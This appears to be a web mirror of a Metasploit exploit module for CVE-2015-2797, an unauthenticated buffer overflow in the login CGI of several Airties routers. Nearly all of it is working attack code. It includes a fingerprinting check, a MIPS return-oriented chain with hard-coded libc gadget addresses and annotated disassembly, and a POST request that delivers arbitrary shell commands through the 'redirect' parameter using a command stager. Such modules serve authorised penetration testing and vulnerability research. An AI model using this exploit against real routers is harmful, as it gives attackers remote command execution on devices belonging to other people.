Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/airties_login_cgi_bof.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Airties login-cgi Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a remote buffer overflow vulnerability on several Airties routers.

19
          The vulnerability exists in the handling of HTTP queries to the login cgi with long

20
          redirect parameters. The vulnerability doesn't require authentication. This module has

21
          been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.

22
          Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,

23
          Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.

24
        },

25
        'Author' => [

26
          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability

27
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module

28
        ],

29
        'License' => MSF_LICENSE,

30
        'Platform' => ['linux'],

31
        'Arch' => ARCH_MIPSBE,

32
        'References' => [

33
          ['CVE', '2015-2797'],

34
          ['EDB', '36577'],

35
          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] # PoC

36
        ],

37
        'Targets' => [

38
          [

39
            'AirTies_Air5650v3TT_FW_1.0.2.0',

40
            {

41
              'Offset' => 359,

42
              'LibcBase' => 0x2aad1000,

43
              'RestoreReg' => 0x0003FE20, # restore s-registers

44
              'System' => 0x0003edff, # address of system-1

45
              'CalcSystem' => 0x000111EC, # calculate the correct address of system

46
              'CallSystem' => 0x00041C10, # call our system

47
              'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call

48
            }

49
          ]

50
        ],

51
        'DisclosureDate' => '2015-03-31',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

62
  end

63


64
  def check

65
    begin

66
      res = send_request_cgi({

67
        'uri' => '/cgi-bin/login',

68
        'method' => 'GET'

69
      })

70


71
      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/

72
        return Exploit::CheckCode::Detected

73
      end

74
    rescue ::Rex::ConnectionError

75
      return Exploit::CheckCode::Unknown

76
    end

77


78
    Exploit::CheckCode::Unknown

79
  end

80


81
  def exploit

82
    print_status("Accessing the vulnerable URL...")

83


84
    unless check == Exploit::CheckCode::Detected

85
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")

86
    end

87


88
    print_status("Exploiting...")

89
    execute_cmdstager(

90
      :flavor => :echo,

91
      :linemax => 100

92
    )

93
  end

94


95
  def prepare_shellcode(cmd)

96
    shellcode = rand_text_alpha_upper(target['Offset'])                    # padding

97
    shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N")     # restore registers with controlled values

98


99
    # 0003FE20                 lw      $ra, 0x48+var_4($sp)

100
    # 0003FE24                 lw      $s7, 0x48+var_8($sp)

101
    # 0003FE28                 lw      $s6, 0x48+var_C($sp)

102
    # 0003FE2C                 lw      $s5, 0x48+var_10($sp)

103
    # 0003FE30                 lw      $s4, 0x48+var_14($sp)

104
    # 0003FE34                 lw      $s3, 0x48+var_18($sp)

105
    # 0003FE38                 lw      $s2, 0x48+var_1C($sp)

106
    # 0003FE3C                 lw      $s1, 0x48+var_20($sp)

107
    # 0003FE40                 lw      $s0, 0x48+var_24($sp)

108
    # 0003FE44                 jr      $ra

109
    # 0003FE48                 addiu   $sp, 0x48

110


111
    shellcode << rand_text_alpha_upper(36)                                 # padding

112
    shellcode << [target['LibcBase'] + target['System']].pack('N')         # s0 - system address-1

113
    shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4

114
    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N')     # $s5 - call system

115


116
    # 00041C10                 move    $t9, $s0

117
    # 00041C14                 jalr    $t9

118
    # 00041C18                 nop

119


120
    shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7

121
    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N')  # write sp to $a0 -> parameter for call to system

122


123
    # 000215B8                 addiu   $a0, $sp, 0x20

124
    # 000215BC                 lw      $ra, 0x1C($sp)

125
    # 000215C0                 jr      $ra

126
    # 000215C4                 addiu   $sp, 0x20

127


128
    shellcode << rand_text_alpha_upper(28)                                 # padding

129
    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N')     # add 1 to s0 (calculate system address)

130


131
    # 000111EC                 move    $t9, $s5

132
    # 000111F0                 jalr    $t9

133
    # 000111F4                 addiu   $s0, 1

134


135
    shellcode << cmd

136
  end

137


138
  def execute_command(cmd, opts)

139
    shellcode = prepare_shellcode(cmd)

140
    begin

141
      res = send_request_cgi({

142
        'method' => 'POST',

143
        'uri' => '/cgi-bin/login',

144
        'encode_params' => false,

145
        'vars_post' => {

146
          'redirect' => shellcode,

147
          'user' => rand_text_alpha(5),

148
          'password' => rand_text_alpha(8)

149
        }

150
      })

151
      return res

152
    rescue ::Rex::ConnectionError

153
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")

154
    end

155
  end

156
end

157


158